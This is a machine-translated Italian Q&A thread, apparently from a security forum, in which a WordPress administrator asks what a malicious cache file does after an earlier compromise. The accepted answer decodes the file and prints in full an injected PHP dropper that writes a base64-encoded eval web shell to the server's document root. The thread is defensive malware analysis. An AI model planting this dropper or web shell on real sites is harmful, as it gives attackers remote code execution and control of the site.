Qualcuno potrebbe aiutarmi a offuscare questo codice script dannoso [duplicato]

Question

Qualcuno potrebbe aiutarmi a offuscare questo codice script dannoso [duplicato]

#1 da (4 voti)

3

Due mesi fa uno dei nostri siti Wordpress era infestato in tutto e per tutto. Questo è stato allo stesso tempo in cui ho iniziato a lavorare in questa azienda. La nostra piattaforma principale è Plone, ma credo che abbiano fatto alcuni progetti al volo usando Wordpress in passato. Quei siti sono stati trascurati e il peso della manutenzione è caduto su di me - non mi dispiace però, è la posizione di entrata e imparo molto su base giornaliera. Ho scansionato il sito utilizzando WordFence, scritto alcuni script di pulizia, cambiato tutte le password, eliminato l'utente amministratore forzato (sì, è arrivato così lontano), perlustrato attraverso DB, rafforzato la sicurezza della directory di caricamento ... Durante la pulizia del sito google taggato il sito per contenuti dannosi (brutto grande avvertimento rosso). Dopo la pulizia completa, ho inviato la richiesta di scansione e il flag di avviso è stato rimosso. La fonte di infestazione era un plug-in falso (non ho idea di chi o perché lo abbia installato), aghi per dire che è stato eliminato con il resto del codice infestato.

Da allora il business è stato normale come consentito da Wordpress. Stiamo ancora avendo molti tentativi di forza bruta; Posso immaginare che il dominio sia stato aggiunto ad alcuni "black-hat registry", ma va bene, dal momento che le password sono potenti e ho impostato il limite di tentativi più il conseguente divieto IP.

Bene, oggi ho ricevuto un avviso da WordFence sul file infestato. La mia pressione sanguigna si alzò come un palloncino riempito di elio. Dopo le indagini ho scoperto che si trattava di un singolo file:

wp-content / cache / meta / wp-cache-d5959f8ceb4b5dc5c5a03125b3d61348.php

E nient'altro è stato influenzato, sembrerebbe. Ma non posso esserne sicuro finché non saprò cosa sta cercando di ottenere questo file. Qualcuno potrebbe dare un'occhiata e magari fornire un link alle risorse che descrivono come è possibile per chiunque caricare questo pezzo di ... codice indesiderato. Ho di nuovo a che fare con il plugin falso? Ho pulito tutto e sigillato la backdoor: (

link

Ho cambiato dominio su www.somedomain.com.

Ci scusiamo per la lunga introduzione, volevo solo chiarire la mia posizione e respingere le ipotesi su eventuali motivi alternativi - visto che capita a qualcun altro che fa una domanda simile senza alcuna informazione di base.

wordpress malware backdoor

posta kamenjan 09.04.2016 - 16:11

fonte

1 risposta

Leggi altre domande sui tag wordpress malware backdoor

È buona norma che tutti i programmi abbiano il proprio ID utente? [chiuso] Perché nmap non può identificare il servizio Danted (socks5) su una porta non standard?

score 4 · Accepted Answer

Sembra che ci siano contenuti Web dannosi. Potrebbe essere utile passare un po 'di tempo a imparare su cookie e PHP . Questo è un cookie codificato manualmente e si riferisce a due altri codici lato server (probabilmente anche codice PHP):

"/ configurationbak.php"
"/"

Probabilmente il secondo file funziona come index.php. Vorrei verificare la presenza di contenuti dannosi in questi due file. In particolare, questo cookie trasmette le variabili in questi due script PHP utilizzando l'URL e il metodo GET per il passaggio dei dati. Quando decodifica la stringa GET utilizzando uno strumento come Decoder URL , ottieni quanto segue:

"uri":"www.somedomain.com/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';","blog_id":1,"post":7,"key":"www.somedomain.com80/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';"

C'è qualche ulteriore offuscamento qui. La chiamata a base64_decode convertirà la stringa "PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8 +" nel seguente:

"<?php eval($_POST1);?>"

Lo strumento di conversione che ho usato per la decodifica è Base 64 Decode .

Sembra una specie di intelligente exploit WordPress che convince in modo ricorsivo la tua pagina web per eseguire il codice dell'hacker in modo che possano accedere all'interprete PHP.

Per sicurezza, dovresti eliminare questo file e stare alla ricerca di file PHP aggiuntivi creati da exploit come questo (ad es. configurationbak.php).